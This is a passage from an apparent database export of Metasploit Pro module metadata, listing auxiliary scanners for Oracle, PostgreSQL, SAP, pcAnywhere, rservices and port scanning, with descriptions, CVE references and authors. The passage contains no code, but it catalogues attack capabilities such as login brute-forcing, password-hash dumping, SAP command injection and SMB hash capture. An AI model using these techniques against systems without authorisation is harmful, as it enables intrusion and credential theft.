OpenVAS gsad interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1610,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/openvas/openvas_omp_login.rb","auxiliary","scanner/openvas/openvas_omp_login","auxiliary/scanner/openvas/openvas_omp_login","OpenVAS OMP Login Utility",300,"This module attempts to authenticate to an OpenVAS OMP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1611,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/openvas/openvas_otp_login.rb","auxiliary","scanner/openvas/openvas_otp_login","auxiliary/scanner/openvas/openvas_otp_login","OpenVAS OTP Login Utility",300,"This module attempts to authenticate to an OpenVAS OTP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1612,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/emc_sid.rb","auxiliary","scanner/oracle/emc_sid","auxiliary/scanner/oracle/emc_sid","Oracle Enterprise Manager Control SID Discovery",300,"This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf","MC " 1613,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/isqlplus_login.rb","auxiliary","scanner/oracle/isqlplus_login","auxiliary/scanner/oracle/isqlplus_login","Oracle iSQL*Plus Login Utility",300,"This module attempts to authenticate against an Oracle ISQL*Plus administration web site using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE. This module does not require a valid SID, but if one is defined, it will be used. Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to fingerprint the version and automatically select the correct POST request.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://carnal0wnage.attackresearch.com","CG , todb " 1614,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb","auxiliary","scanner/oracle/isqlplus_sidbrute","auxiliary/scanner/oracle/isqlplus_sidbrute","Oracle isqlplus SID Check",300,"This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus login pages. It does this by testing Oracle error responses returned in the HTTP response. Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error. Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to fingerprint the version and automatically select the correct POST request.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://carnal0wnage.attackresearch.com","CG , todb " 1615,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/oracle_hashdump.rb","auxiliary","scanner/oracle/oracle_hashdump","auxiliary/scanner/oracle/oracle_hashdump","Oracle Password Hashdump",300,"This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as loot for later cracking.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1616,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/oracle_login.rb","auxiliary","scanner/oracle/oracle_login","auxiliary/scanner/oracle/oracle_login","Oracle RDBMS Login Utility",300,"This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, URL-http://nmap.org/nsedoc/scripts/oracle-brute.html, URL-http://www.oracle.com/us/products/database/index.html","Patrik Karlsson , todb " 1617,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/sid_brute.rb","auxiliary","scanner/oracle/sid_brute","auxiliary/scanner/oracle/sid_brute","Oracle TNS Listener SID Bruteforce",300,"This module queries the TNS listner for a valid Oracle database instance name (also known as a SID). Any response other than a ""reject"" will be considered a success. If a specific SID is provided, that SID will be attempted. Otherwise, SIDs read from the named file will be attempted in sequence instead.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"todb " 1618,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/sid_enum.rb","auxiliary","scanner/oracle/sid_enum","auxiliary/scanner/oracle/sid_enum","Oracle TNS Listener SID Enumeration",300,"This module simply queries the TNS listner for the Oracle SID. With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",,,"aggressive","t",,"CG , MC " 1619,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/spy_sid.rb","auxiliary","scanner/oracle/spy_sid","auxiliary/scanner/oracle/spy_sid","Oracle Application Server Spy Servlet SID Enumeration",300,"This module makes a request to the Oracle Application Server in an attempt to discover the SID.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf","MC " 1620,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/tnslsnr_version.rb","auxiliary","scanner/oracle/tnslsnr_version","auxiliary/scanner/oracle/tnslsnr_version","Oracle TNS Listener Service Version Query",300,"This module simply queries the tnslsnr service for the Oracle build.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",,,"aggressive","t",,"CG " 1621,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/xdb_sid.rb","auxiliary","scanner/oracle/xdb_sid","auxiliary/scanner/oracle/xdb_sid","Oracle XML DB SID Discovery",300,"This module simply makes a authenticated request to retrieve the sid from the Oracle XML DB httpd server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf","MC " 1622,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb","auxiliary","scanner/oracle/xdb_sid_brute","auxiliary/scanner/oracle/xdb_sid_brute","Oracle XML DB SID Discovery via Brute Force",300,"This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan's default oracle password list.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf, URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv","nebulus" 1623,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb","auxiliary","scanner/pcanywhere/pcanywhere_login","auxiliary/scanner/pcanywhere/pcanywhere_login","PcAnywhere Login Scanner",300,"This module will test pcAnywhere logins on a range of machines and report successful logins.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","theLightCosine " 1624,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb","auxiliary","scanner/pcanywhere/pcanywhere_tcp","auxiliary/scanner/pcanywhere/pcanywhere_tcp","PcAnywhere TCP Service Discovery",300,"Discover active pcAnywhere services through TCP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1625,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb","auxiliary","scanner/pcanywhere/pcanywhere_udp","auxiliary/scanner/pcanywhere/pcanywhere_udp","PcAnywhere UDP Service Discovery",300,"Discover active pcAnywhere services through UDP","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.unixwiz.net/tools/pcascan.txt","hdm " 1626,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pop3/pop3_login.rb","auxiliary","scanner/pop3/pop3_login","auxiliary/scanner/pop3/pop3_login","POP3 Login Utility",300,"This module attempts to authenticate to an POP3 service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc1734.txt, URL-http://www.ietf.org/rfc/rfc1939.txt","==[ Alligator Security Team ]==, Heyder Andrade " 1627,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/pop3/pop3_version.rb","auxiliary","scanner/pop3/pop3_version","auxiliary/scanner/pop3/pop3_version","POP3 Banner Grabber",300,"POP3 Banner Grabber","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1628,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/ack.rb","auxiliary","scanner/portscan/ack","auxiliary/scanner/portscan/ack","TCP ACK Firewall Scanner",300,"Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1629,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/ftpbounce.rb","auxiliary","scanner/portscan/ftpbounce","auxiliary/scanner/portscan/ftpbounce","FTP Bounce Port Scanner",300,"Enumerate TCP services via the FTP bounce PORT/LIST method, which can still come in handy every once in a while (I know of a server that still allows this just fine...).","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1630,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/syn.rb","auxiliary","scanner/portscan/syn","auxiliary/scanner/portscan/syn","TCP SYN Port Scanner",300,"Enumerate open TCP services using a raw SYN scan.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1631,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/tcp.rb","auxiliary","scanner/portscan/tcp","auxiliary/scanner/portscan/tcp","TCP Port Scanner",300,"Enumerate open TCP services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , kris katterjohn " 1632,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/portscan/xmas.rb","auxiliary","scanner/portscan/xmas","auxiliary/scanner/portscan/xmas","TCP ""XMas"" Port Scanner",300,"Enumerate open|filtered TCP services using a raw ""XMas"" scan; this sends probes containing the FIN, PSH and URG flags.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1633,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb","auxiliary","scanner/postgres/postgres_dbname_flag_injection","auxiliary/scanner/postgres/postgres_dbname_flag_injection","PostgreSQL Database Name Command Line Flag Injection",300,"This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that are vulnerable to command-line flag injection through CVE-2013-1899. This can lead to denial of service, privilege escalation, or even arbitrary code execution.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-1899, URL-http://www.postgresql.org/support/security/faq/2013-04-04/","hdm " 1634,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_hashdump.rb","auxiliary","scanner/postgres/postgres_hashdump","auxiliary/scanner/postgres/postgres_hashdump","Postgres Password Hashdump",300,"This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1635,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_login.rb","auxiliary","scanner/postgres/postgres_login","auxiliary/scanner/postgres/postgres_login","PostgreSQL Login Utility",300,"This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, URL-http://www.postgresql.org","todb " 1636,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_schemadump.rb","auxiliary","scanner/postgres/postgres_schemadump","auxiliary/scanner/postgres/postgres_schemadump","Postgres Schema Dump",300,"This module extracts the schema information from a Postgres server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1637,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/postgres/postgres_version.rb","auxiliary","scanner/postgres/postgres_version","auxiliary/scanner/postgres/postgres_version","PostgreSQL Version Probe",300,"Enumerates the verion of PostgreSQL servers.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.postgresql.org","todb " 1638,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rdp/ms12_020_check.rb","auxiliary","scanner/rdp/ms12_020_check","auxiliary/scanner/rdp/ms12_020_check","MS12-020 Microsoft Remote Desktop Checker",300,"This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-0002, EDB-18606, MSB-MS12-020, URL-http://technet.microsoft.com/en-us/security/bulletin/ms12-020, URL-https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse","Brandon McCann @zeknox , Royce Davis @R3dy_ " 1639,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rogue/rogue_recv.rb","auxiliary","scanner/rogue/rogue_recv","auxiliary/scanner/rogue/rogue_recv","Rogue Gateway Detection: Receiver",300,"This module listens for replies to the requests sent by the rogue_send module. The RPORT, CPORT, and ECHOID values must match the rogue_send parameters used exactly.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.metasploit.com/research/projects/rogue_network/","hdm " 1640,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rogue/rogue_send.rb","auxiliary","scanner/rogue/rogue_send","auxiliary/scanner/rogue/rogue_send","Rogue Gateway Detection: Sender",300,"This module send a series of TCP SYN and ICMP ECHO requests to each internal target host, spoofing the source address of an external system running the rogue_recv module. This allows the system running the rogue_recv module to determine what external IP a given internal system is using as its default route.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.metasploit.com/research/projects/rogue_network/","hdm " 1641,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rservices/rexec_login.rb","auxiliary","scanner/rservices/rexec_login","auxiliary/scanner/rservices/rexec_login","rexec Authentication Scanner",300,"This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, CVE-1999-0651","jduck " 1642,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rservices/rlogin_login.rb","auxiliary","scanner/rservices/rlogin_login","auxiliary/scanner/rservices/rlogin_login","rlogin Authentication Scanner",300,"This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, CVE-1999-0651","jduck " 1643,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rservices/rsh_login.rb","auxiliary","scanner/rservices/rsh_login","auxiliary/scanner/rservices/rsh_login","rsh Authentication Scanner",300,"This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, CVE-1999-0651","jduck " 1644,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb","auxiliary","scanner/sap/sap_ctc_verb_tampering_user_mgmt","auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt","SAP CTC Service Verb Tampering User Management",300,"This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service. The service is vulnerable to verb tampering allowing for unauthorised OS user management. Information about resolution should be available at SAP notes 1589525 and 1624450 (authentication required).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/, URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf","Alexandr Polyakov, nmonkee" 1645,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_icf_public_info.rb","auxiliary","scanner/sap/sap_icf_public_info","auxiliary/scanner/sap/sap_icf_public_info","SAP ICF /sap/public/info Service Sensitive Information Gathering",300,"This module uses the /sap/public/info service within SAP Internet Communication Framework (ICF) to obtain the operating system version, SAP version, IP address and other information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Agnivesh Sathasivam, ChrisJohnRiley, nmonkee" 1646,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb","auxiliary","scanner/sap/sap_icm_urlscan","auxiliary/scanner/sap/sap_icm_urlscan","SAP URL Scanner",300,"This module scans for commonly found SAP Internet Communication Manager URLs and outputs return codes for the user.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0738","Chris John Riley" 1647,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb","auxiliary","scanner/sap/sap_mgmt_con_abaplog","auxiliary/scanner/sap/sap_mgmt_con_abaplog","SAP Management Console ABAP Syslog Disclosure",300,"This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1648,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb","auxiliary","scanner/sap/sap_mgmt_con_brute_login","auxiliary/scanner/sap/sap_mgmt_con_brute_login","SAP Management Console Brute Force",300,"This module simply attempts to brute force the username | password for the SAP Management Console SOAP Interface. By setting the SAP SID value, a list of default SAP users can be tested without needing to set a USERNAME or USER_FILE value. The default usernames are stored in ./data/wordlists/sap_common.txt (the value of SAP SID is automatically inserted into the username to replce ).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1649,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb","auxiliary","scanner/sap/sap_mgmt_con_extractusers","auxiliary/scanner/sap/sap_mgmt_con_extractusers","SAP Management Console Extract Users",300,"This module simply attempts to extract SAP users from the ABAP Syslog through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1650,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb","auxiliary","scanner/sap/sap_mgmt_con_getaccesspoints","auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints","SAP Management Console Get Access Points",300,"This module simply attempts to output a list of SAP access points through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1651,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb","auxiliary","scanner/sap/sap_mgmt_con_getenv","auxiliary/scanner/sap/sap_mgmt_con_getenv","SAP Management Console getEnvironment",300,"This module simply attempts to identify SAP Environment settings through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1652,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb","auxiliary","scanner/sap/sap_mgmt_con_getlogfiles","auxiliary/scanner/sap/sap_mgmt_con_getlogfiles","SAP Management Console Get Logfile",300,"This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP Interface. Please use the sap_mgmt_con_listlogfiles extension to view a list of available files.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Bruno Morisson , Chris John Riley" 1653,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb","auxiliary","scanner/sap/sap_mgmt_con_getprocesslist","auxiliary/scanner/sap/sap_mgmt_con_getprocesslist","SAP Management Console GetProcessList",300,"This module attempts to list SAP processes through the SAP Management Console SOAP Interface","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Bruno Morisson , Chris John Riley" 1654,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb","auxiliary","scanner/sap/sap_mgmt_con_getprocessparameter","auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter","SAP Management Console Get Process Parameters",300,"This module simply attempts to output a SAP process parameters and configuration settings through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1655,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb","auxiliary","scanner/sap/sap_mgmt_con_instanceproperties","auxiliary/scanner/sap/sap_mgmt_con_instanceproperties","SAP Management Console Instance Properties",300,"This module simply attempts to identify the instance properties through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1656,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb","auxiliary","scanner/sap/sap_mgmt_con_listlogfiles","auxiliary/scanner/sap/sap_mgmt_con_listlogfiles","SAP Management Console List Logfiles",300,"This module simply attempts to output a list of available logfiles and developer tracefiles through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1657,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb","auxiliary","scanner/sap/sap_mgmt_con_startprofile","auxiliary/scanner/sap/sap_mgmt_con_startprofile","SAP Management Console getStartProfile",300,"This module simply attempts to acces the SAP startup profile through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1658,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb","auxiliary","scanner/sap/sap_mgmt_con_version","auxiliary/scanner/sap/sap_mgmt_con_version","SAP Management Console Version Detection",300,"This module simply attempts to identify the version of SAP through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1659,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_router_info_request.rb","auxiliary","scanner/sap/sap_router_info_request","auxiliary/scanner/sap/sap_router_info_request","SAPRouter Admin Request",300,"Display the remote connection table from a SAPRouter.","BSD License","f",,,,"aggressive","t","URL-http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf, URL-http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/, URL-http://www.onapsis.com/research-free-solutions.php","Mariano Nunez, nmonkee" 1660,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_service_discovery.rb","auxiliary","scanner/sap/sap_service_discovery","auxiliary/scanner/sap/sap_service_discovery","SAP Service Discovery",300,"Scans for listening SAP services.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1661,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_smb_relay.rb","auxiliary","scanner/sap/sap_smb_relay","auxiliary/scanner/sap/sap_smb_relay","SAP SMB Relay Abuse",300,"This module exploits provides several SMB Relay abuse through different SAP services and functions. The attack is done through specially crafted requests including a UNC Path which will be accessing by the SAP system while trying to process the request. In order to get the hashes the auxiliary/server/capture/smb module can be used.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/, URL-https://service.sap.com/sap/support/notes/1597066","Alexey Tyurin, nmonkee" 1662,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb","auxiliary","scanner/sap/sap_soap_bapi_user_create1","auxiliary/scanner/sap/sap_soap_bapi_user_create1","SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation",300,"This module makes use of the BAPI_USER_CREATE1 function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1663,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb","auxiliary","scanner/sap/sap_soap_rfc_brute_login","auxiliary/scanner/sap/sap_soap_rfc_brute_login","SAP /sap/bc/soap/rfc SOAP Service RFC_PING Login Brute Forcer",300,"This module attempts to brute force SAP username and passwords through the /sap/bc/soap/rfc SOAP service, using RFC_PING function. Default clients can be tested without needing to set a CLIENT. Common/Default user and password combinations can be tested just setting DEFAULT_CRED variable to true. These default combinations are stored in MSF_DATA_DIRECTORY/wordlists/sap_default.txt.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee" 1664,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec","auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec","SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection",300,"This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee" 1665,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec","auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec","SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection",300,"This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee" 1666,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb","auxiliary","scanner/sap/sap_soap_rfc_eps_get_directory_listing","auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing","SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure",300,"This module abuses the SAP NetWeaver EPS_GET_DIRECTORY_LISTING function, on the SAP SOAP RFC Service, to check for remote directory existence and get the number of entries on it. The module can also be used to capture SMB hashes by using a fake SMB share as DIR.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com","nmonkee" 1667,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb","auxiliary","scanner/sap/sap_soap_rfc_pfl_check_os_file_existence","auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence","SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check",300,"This module abuses the SAP NetWeaver PFL_CHECK_OS_FILE_EXISTENCE function, on the SAP SOAP RFC Service, to check for files existence on the remote file system. The module can also be used to capture SMB hashes by using a fake SMB share as FILEPATH.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-51645, OSVDB-78537, URL-http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/","lexey Tyurin, nmonkee" 1668,"2013-05-11 